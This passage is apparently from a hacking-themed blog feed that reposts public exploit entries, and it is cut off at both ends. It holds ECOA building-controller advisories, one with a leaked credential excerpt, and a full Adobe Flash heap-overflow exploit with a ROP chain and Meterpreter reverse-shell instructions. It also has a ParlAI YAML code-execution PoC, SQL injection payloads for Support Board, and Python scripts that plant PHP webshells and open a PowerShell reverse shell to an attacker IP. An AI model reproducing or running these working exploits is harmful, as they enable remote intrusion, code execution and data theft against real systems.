specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause denial of service scenario. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5680 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php 25.06.2021 -- Arbitrary File Deletion ----------------------- - Attacker can delete any file by abusing 'cfile' GET parameter in fmanerdel applet and using traversal sequence. Request: GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1
  17. HireHackking

    ECOA Building Automation System - Missing Encryption Of Sensitive Information

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Missing Encryption Of Sensitive Information Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller stores sensitive data (backup exports) in clear-text. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5676 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php 25.06.2021 -- Missing Encryption of Sensitive Information ------------------------------------------- - Data stored on the system is not protected/encrypted. sql_[DATE]linux.dat reveals clear-text password from backup. Excerpt from DB: Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377
  18. HireHackking

    Adobe Flash Player - Integer Overflow

    HireHackking posted a blog entry in Hacker Technology
    // Exploit Title: Adobe Flash Player - Integer Overflow // Exploit Author: Matteo Memelli (ryujin@offensive-security) // Date: 14/01/2017 // Original PoC: https://bugs.chromium.org/p/project-zero/issues/detail?id=323&can=1&q=Shader // CVE: CVE-2015-3104 // Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3104 package { import flash.display.*; import flash.utils.ByteArray; import flash.events.Event; import flash.events.MouseEvent; import flash.text.* import mx.utils.Base64Decoder; public class ShaderInputOverflow extends Sprite { public var bb:ByteArray = null; public var allocate:Array; public var MAX_ARRAY:uint = 81920; public var text:TextField = new TextField(); public var gText:String = ""; public var corrupted:uint = 0; public var corrupted_ba_address:uint = 0; public var corrupted_ba_pos:uint = 0; public var next_ba_address:uint = 0; public var NPSWF32Base:uint = 0; public function ShaderInputOverflow():void { if (stage) drawText(); else addEventListener(Event.ADDED_TO_STAGE, drawText); drawText(); var i:uint; allocate = new Array(); for (i = 0; i < MAX_ARRAY; i++) { bb = new ByteArray(); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); allocate.push(bb); } // We create "holes" of size 0x18 bytes on the heap i = MAX_ARRAY/2; while (i<MAX_ARRAY) { if (i % 2 != 0) { allocate[i] = null; } i++; } var ba:ByteArray = new ByteArray(); ba.writeByte(0xa1); // Define parameter? ba.writeByte(0x02); // Output. ba.writeByte(0x04); // Type: 4 floats. ba.writeByte(0x00); // 16-bit field, ?? ba.writeByte(0x01); ba.writeByte(0xff); // Mask. ba.writeByte(0x41); ba.writeByte(0x00); // Param name: 'A' ba.writeByte(0xa3); // Add texture? ba.writeByte(0x00); // Index? ba.writeByte(0x40); // 64 channels. ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x00); // Texture name: 'BBBB' ba.position = 0; var baOut:ByteArray = new ByteArray(); var baIn:ByteArray = new ByteArray(); // Overwrite ByteArray::Buffer Object capacity field with 0xffffffff // and the pointer to the data to 0x16000000 baIn.writeUnsignedInt(0x6230306e); baIn.writeUnsignedInt(0x6230306e); baIn.writeUnsignedInt(0x41414141); // ptr baIn.writeUnsignedInt(0x41414141); // 0x1 // Offset can be 0x10 bytes baIn.writeUnsignedInt(0x16000000); // ptr to data baIn.writeUnsignedInt(0xffffffff); // capacity baIn.writeUnsignedInt(0x16000000); // length / ptr to data // Another time in case the offset is 0x8 bytes baIn.writeUnsignedInt(0xffffffff); // capacity baIn.writeUnsignedInt(0xffffffff); // length var job:ShaderJob = new ShaderJob(); var shader:Shader = new Shader(); shader.byteCode = ba; shader.data.BBBB.width = 8192; shader.data.BBBB.height = 8192; shader.data.BBBB.input = baIn; job.target = baOut; job.width = 1; job.height = 1; job.shader = shader; // We need to catch the Error thrown by Flash to continue the execution // job.start triggers the copy that causes the heap overflow try { job.start(true); } catch (err:Error) { trace("w00t"); } var s:spray = new spray(); corrupted = findCorrupted(); allocate[corrupted].position = 0; gText += "The corrupted ByteArray object is at index " + corrupted.toString() + " of the 'allocate' array\n"; gText += "The length of the corrupted ByteArray is " + (allocate[corrupted].length).toString(16) + "\n"; findCorruptedAddress(); gText += "Corrupted ByteArray::Buffer object address 0x" + (corrupted_ba_address).toString(16) + "\n"; var NPSWF32Ptr:uint = readDword((corrupted_ba_address+0x18*2)); gText += "NPSWF32Ptr: 0x" + NPSWF32Ptr.toString(16) + "\n"; NPSWF32Base = findNPSWF32_Base(NPSWF32Ptr); gText += "NPSWF32Base Address: 0x" + NPSWF32Base.toString(16) + "\n"; // Look for the corrupted ByteArray::Buffer object address var tosearch:uint = corrupted_ba_address; gText += "Ptr to search: 0x" + tosearch.toString(16) + "\n"; var VTableObj:uint = findVTable(tosearch); gText += "VTable Address: 0x" + VTableObj.toString(16) + "\n"; updateText(); var methodEnvVtable:uint = readDword(VTableObj+0xd4); gText += "methodEnvVtable Address: 0x" + methodEnvVtable.toString(16) + "\n"; updateText(); // Crash on the Jitted pointer dereference that leads to code execution //writeDword((VTableObj+0xd4), 0x42424242); // Control the Jitted pointer dereference that leads to code execution writeROPChain(NPSWF32Base); // Decode and Write the files for the privilege escalation to memory var dll:ByteArray = new ByteArray(); var met:ByteArray = new ByteArray(); var dec1:Base64Decoder = new Base64Decoder(); var dec2:Base64Decoder = new Base64Decoder(); // sandbox exploit code dec1.decode("YOUR BASE64 PRIVESC SANDBOX ESCAPE DLL CODE HERE"); dll = dec1.toByteArray(); // msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=YOURIP -e generic/none -f exe > pwnd.exe // base64 pwnd.exe | tr --delete '\n' // Meterpreter executable or any other payload… dec2.decode("YOUR BASE64 METERPRETER CODE HERE"); met = dec2.toByteArray(); writeBytes(0x1a100000, met); writeBytes(0x1a200000, dll); writeDword((VTableObj+0xd4), 0x1a000000); gText += allocate[corrupted].toString(); } private function hexStringToByteArray(hexstring:String) : ByteArray { var bindata:ByteArray = new ByteArray(); bindata.endian = "littleEndian"; var hexstr:String = null; var count:uint = 0; while(count < hexstring.length) { hexstr = hexstring.charAt(count) + (hexstring.charAt(count + 1)); bindata.writeByte(parseInt(hexstr, 16)); count += 2; } return bindata; } private function writeROPChain(NPSWF32Base:uint):void { var ROPaddr:uint = 0x1a00CBE2; writeDword(0x1a000004, (NPSWF32Base+0x00418a60)); // PIVOT XCHG ECX,ESP... // Save stack information to restore the execution flow after shellcode writeDword(0x1a000000, (NPSWF32Base+0x00007324)); // POP EAX # RETN writeDword(ROPaddr, 0x1a000400); ROPaddr +=4 ; // SAVE ECX VALUE HERE writeDword(ROPaddr, (NPSWF32Base+0x0000268e)); ROPaddr +=4 ; // MOV [EAX],ECX # RETN writeDword(ROPaddr, (NPSWF32Base+0x00007324)); ROPaddr +=4 ; // POP EAX # RETN writeDword(ROPaddr, 0x1a000404); ROPaddr +=4 ; // SAVE EBX VALUE HERE writeDword(ROPaddr, (NPSWF32Base+0x000064c54)); ROPaddr +=4 ; // MOV [EAX],EBX # POP EBX # POP ECX; RETN writeDword(ROPaddr, 0x41414141); ROPaddr +=4 ; // JUNK writeDword(ROPaddr, 0x42424242); ROPaddr +=4 ; // JUNK // Mona Chain writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN writeDword(ROPaddr, (NPSWF32Base+0x0077c1eb)); ROPaddr +=4 ; // POP EBX # RETN writeDword(ROPaddr, 0x00000201); ROPaddr +=4 ; writeDword(ROPaddr, (NPSWF32Base+0x007fff57)); ROPaddr +=4 ; // POP EDX # RETN writeDword(ROPaddr, 0x00000040); ROPaddr +=4 ; writeDword(ROPaddr, (NPSWF32Base+0x00b433a9)); ROPaddr +=4 ; // POP ECX # RETN writeDword(ROPaddr, (NPSWF32Base+0x00f7e6f5)); ROPaddr +=4 ; // &Writable location writeDword(ROPaddr, (NPSWF32Base+0x00b1ad8f)); ROPaddr +=4 ; // POP EDI # RETN writeDword(ROPaddr, (NPSWF32Base+0x00273302)); ROPaddr +=4 ; // ROP NOP # RETN writeDword(ROPaddr, (NPSWF32Base+0x006cb604)); ROPaddr +=4 ; // POP ESI # RETN writeDword(ROPaddr, (NPSWF32Base+0x0000d98f)); ROPaddr +=4 ; // JMP [EAX] writeDword(ROPaddr, (NPSWF32Base+0x002742d3)); ROPaddr +=4 ; // POP EAX # RETN writeDword(ROPaddr, (NPSWF32Base+0x00b7d364)); ROPaddr +=4 ; // ptr to VirtualProtect IAT writeDword(ROPaddr, (NPSWF32Base+0x00a4a349)); ROPaddr +=4 ; // PUSHAD # RETN writeDword(ROPaddr, (NPSWF32Base+0x0015fce4)); ROPaddr +=4 ; // PTR TO JMP ESP // NOPsled writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // shellcode var Shellcode:String = new String(); Shellcode += "..... YOUR SANDBOX EVASION SHELLCODE HERE ... "; writeBytes(ROPaddr, hexStringToByteArray(Shellcode)); ROPaddr += Shellcode.length/2; // Restore component // 1a00cc56 8b0d0004001a mov ecx,dword ptr ds:[1A000400h] // 1a00cc5c 8b1d0404001a mov ebx,dword ptr ds:[1A000404h] // 1a00cc62 28d9 sub cl,bl // 1a00cc64 87cc xchg ecx,esp // 1a00cc66 8bec mov ebp,esp // 1a00cc68 83c52c add ebp,2Ch // 1a00cc6b 31c0 xor eax,eax // 1a00cc6d c3 ret var Restore:String = new String(); Restore = "8b0d0004001a8b1d0404001a28d987cc8bec83c52c31c0c3"; writeBytes(ROPaddr, hexStringToByteArray(Restore)); ROPaddr += Restore.length/2; } private function findVTable(startAddress:uint):uint { // Find the VTable Object Address within the ByteArrayObject allocate[corrupted].endian = "littleEndian"; var addr:uint = 0; var base:uint = 0x16000000; var bstart:uint = base; var count:uint = 0; while (true) { if (readDword(base) == startAddress) { addr = bstart+count; // ByteArray::Buffer pointer is at offset +0x40 addr = addr - 0x40; // VTable Object pointer is at +0x8 return readDword(addr+0x8); } else { base += 4; count += 4; } } return addr; } private function findNPSWF32_Base(NPSWF32Ptr:uint):uint { // Find a DLL base address by appling the scan down technique var addr:uint = NPSWF32Ptr & 0xfffff000; while (true) { if (readDword(addr) == 0x00905a4d) { return addr; } else { addr = addr - 0x1000; } } return addr; } private function readDword(pAddress:uint):uint { // Read a DWORD from an address // by changing the ptr to array of bytes var tmpIndex:uint = 0; var res:uint = 0; // Change ptr to array of bytes tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(pAddress); allocate[corrupted].position = 0; // Read a DWORD from the new address res = allocate[corrupted].readUnsignedInt(); // Reset ptr to array of bytes to 0x16000000 tmpIndex = (corrupted_ba_address + 0x8) - pAddress; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(0x16000000); return res; } private function writeDword(pAddress:uint, value:uint):void { // write a DWORD to an address // by changing the ptr to array of bytes var tmpIndex:uint = 0; // Change ptr to array of bytes tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(pAddress); allocate[corrupted].position = 0; // Read a DWORD from the new address allocate[corrupted].writeUnsignedInt(value); // Reset ptr to array of bytes to 0x16000000 tmpIndex = (corrupted_ba_address + 0x8) - pAddress; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(0x16000000); } private function writeBytes(pAddress:uint, data:ByteArray):void { // write a ByteArray to an address // by changing the ptr to array of bytes var tmpIndex:uint = 0; // Change ptr to array of bytes tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(pAddress); allocate[corrupted].position = 0; // Read a ByteArray tp the new address allocate[corrupted].writeBytes(data, 0, 0); // Reset ptr to array of bytes to 0x16000000 tmpIndex = (corrupted_ba_address + 0x8) - pAddress; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(0x16000000); } private function findCorruptedAddress():void { allocate[corrupted].position = 0; allocate[corrupted].endian = "littleEndian"; while (true) { if(allocate[corrupted].readUnsignedInt() == 0x6230306e) { if(allocate[corrupted].readUnsignedInt() == 0x6230306e) { // Corrupted Object starts just after the second 0x6230306e tag in case the offset is 0x10 // otherwise after the two 0x41414141 dwords in case the offset is 0x8 // OFFSET 0x10 LENGTH = 0x16000000 if (allocate[corrupted].length == 0x16000000) corrupted_ba_pos = allocate[corrupted].position; // OFFSET 0x8 LENGTH = 0xffffffff else corrupted_ba_pos = allocate[corrupted].position + 0x8; // We calculate the address of the corrupted object by using the index // and the base address that we set through the heap overflow. corrupted_ba_address = 0x16000000 + corrupted_ba_pos; // Since every in-use ByteArray object is alternated with a free one // (we created the holes), the next in-use ByteArray is at 0x18*2 bytes // from the corrupted one. next_ba_address = corrupted_ba_address + 0x18*2; return; } } } return; } private function findCorrupted():uint { // Find the corrupted ByteArray::Buffer object. // We can find it by checking for a size different from the // original 0x10 bytes, since the ByteArray data is 16 bytes // for all the objects we allocated, except the corrupted one. var i:uint = MAX_ARRAY/2; while (i<MAX_ARRAY) { if (i % 2 == 0) { if(allocate[i].length != 0x10) { return i; } } i++; } return 0; } public function updateText(e:Event = null):void { text.text = gText; } public function drawText(e:Event = null):void { removeEventListener(Event.ADDED_TO_STAGE, drawText); text.text = gText; text.width = 300; text.height = 100; text.x = 10; text.y = 10; text.multiline = true; text.wordWrap = true; text.background = true; text.border = true; var format:TextFormat = new TextFormat(); format.font = "Verdana"; format.color = 0xff0000; format.size = 8; text.defaultTextFormat = format; addChild(text); text.addEventListener(MouseEvent.MOUSE_DOWN, mouseDownScroll); } public function mouseDownScroll(event:MouseEvent):void { text.scrollV++; } } } import flash.display.MovieClip; import flash.utils.*; class spray extends MovieClip { public var allocate:Array; public function spray() { HeapSpray(); } public function HeapSpray() : void { var chunk_size:uint = 1048576; // 0x100000 var block_size:uint = 65536; // 0x10000 var heapblocklen:uint = 0; var spraychunks:uint = 0; var heapblock1:ByteArray; var heapblock2:ByteArray; var heapblock3:ByteArray; heapblock1 = new ByteArray(); heapblock1.endian = Endian.LITTLE_ENDIAN; heapblock1.writeInt(0x41424344); heapblocklen = heapblocklen + 4; while(heapblocklen < block_size) { heapblock1.writeByte(0x0d); // padding to 64K heapblocklen = heapblocklen + 1; } heapblock2 = new ByteArray(); while(heapblock2.length < chunk_size) { heapblock2.writeBytes(heapblock1, 0, heapblock1.length); } allocate = new Array(); // 600MB spray while(spraychunks < 50) { heapblock3 = new ByteArray(); heapblock3.writeBytes(heapblock2, 0, heapblock2.length); allocate.push(heapblock3); spraychunks = spraychunks + 1; } } }
  19. HireHackking

    Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai # Date: 2021-09-11 # Exploit Author: Abhiram V # Vendor Homepage: https://parl.ai/ # Software Link: https://github.com/facebookresearch/ParlAI # Version: < 1.1.0 # Tested on: Linux # CVE: CVE-2021-24040 # References : # https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg # | https://anon-artist.github.io/blogs/blog3.html | ############################################################################ Introduction ParlAI (pronounced “par-lay”) is a free, open-source python framework for sharing, training and evaluating AI models on a variety of openly available dialogue datasets. ############################################################################ Vulnerability details ############################################################################ Description ParlAI was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitrary Code Execution. Proof of Concept Create the following PoC file (exploit.py) import os #os.system('pip3 install parlai') from parlai.chat_service.utils import config exploit = """!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')" """ open('config.yml','w+').write(exploit) config.parse_configuration_file('config.yml') Execute the python script ie, python3 exploit.py Impact Code Execution ############################################################################
  20. HireHackking

    Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection # Date: 2021-08-13 # Exploit Author: mari0x00 # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 # Version: 1.0 # Tested on: Windows 10 + XAMPP #!/usr/bin/python3 import requests, socket, threading import base64, time, sys print(('''###########################################################''',"red")) print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) print(('''###########################################################''',"red")) print("") URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' path = path.replace("\\", "\\\\") rhost = input("Provide attacker IP: ") or "127.0.0.1" rport = input("Provide attacker listening port: ") or "1337" # sending webshell payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} requests.post(URL, data=payload) def shell(rhost, rport): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.bind((rhost, int(rport))) except socket.error as msg: print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1]) sys.exit() s.settimeout(5) s.listen(5) print('[+] Waiting for connection..') conn = False command='' while conn == False: try: conn, addr = s.accept() print("Got a connection from " + addr[0] + ":" + str(addr[1])) conn.send('\n'.encode()) time.sleep(1) print(conn.recv(0x10000).decode()) while(command != 'exit'): command=input('') conn.send((command + '\n').encode()) time.sleep(.3) res = conn.recv(0x10000) print(res.decode()) s.close() sys.exit("[!] Program exited") except socket.timeout: pass def start_shell(rhost, rport): revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" revshell = revshell.encode('ascii') revshell = base64.b64encode(revshell) revshell = revshell.decode('ascii') connection = requests.get(URL+"/lol.php?cmd=" + revshell) print("[+] Starting to listen on port " + rport) time.sleep(0.5) threading.Thread(target=shell, args=(rhost, rport)).start() time.sleep(2) print("[+] Sending the reverse shell payload") threading.Thread(target=start_shell, args=(rhost, rport)).start()
  21. HireHackking

    Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated) # Date: 29.08.2021 # Exploit Author: John Jefferson Li <yiyohwi@naver.com> # Vendor Homepage: https://board.support/ # Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 # Version: 3.3.3 # Tested on: Ubuntu 20.04.2 LTS ----- PoC 1: Error Based SQLi (status_code) ----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: status_code (POST) function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false ----- PoC 2: Error Based SQLi (department)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: department (POST) function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false ----- PoC 3: Error Based SQLi (user_id) ----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: user_id (POST) function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false ----- PoC 4: Time Based SQLi (conversation_id)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_id (POST) function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false ----- PoC 5: Time Based SQLi (conversation_status_code)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_status_code (POST) function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false ----- PoC 6: Time Based SQLi (recipient_id)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: recipient_id (POST) function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false
  22. HireHackking

    Purchase Order Management System 1.0 - Remote File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Purchase Order Management System 1.0 - Remote File Upload # Date: 2021-09-14 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html # Version: v1.0 # Tested on: Windows 10 - XAMPP Server # [ About the Purchase Order Management System ] : #This Purchase Order Management System can store the list of all company's, #suppliers for easily retrieving the suppliers' data upon generating the purchase order. #It also stores the list of Items that the company possibly purchased from their suppliers. #Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. #Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request. #!/bin/env python3 import requests import time import sys from colorama import Fore, Style if len(sys.argv) !=2: print (''' ########################################################### #Purchase Order Management System 1.0 - Remote File Upload# # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:aryanchehreghani@yahoo.com # # -+-USE:python script.py <target url> # # [+]Example:python3 script.py http://127.0.0.1/ # ########################################################### ''') else: try: url = sys.argv[1] print() print('[*] Trying to login...') time.sleep(1) login = url + '/classes/Login.php?f=login' payload_name = "shell.php" payload_file = r"""<?php @system($_GET['tapesh']); ?>""" session = requests.session() post_data = {"username": "'=''or'", "password": "'=''or'"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() if user_login.text == '{"status":"success"}': print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!') upload_url = url + "/classes/Users.php?f=save" cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"} data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n" print('[*] Trying to shell...') time.sleep(2) try: print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!') upload = session.post(upload_url, headers=headers, cookies=cookie, data=data) upload_check = f'{url}/uploads' r = requests.get(upload_check) if payload_name in r.text: payloads = r.text.split('<a href="') for load in payloads: if payload_name in load: payload = load.split('"') payload = payload[0] else: pass else: exit() except: print ("Upload failed try again\n") exit() try: print("Check Your Target ;)\n") 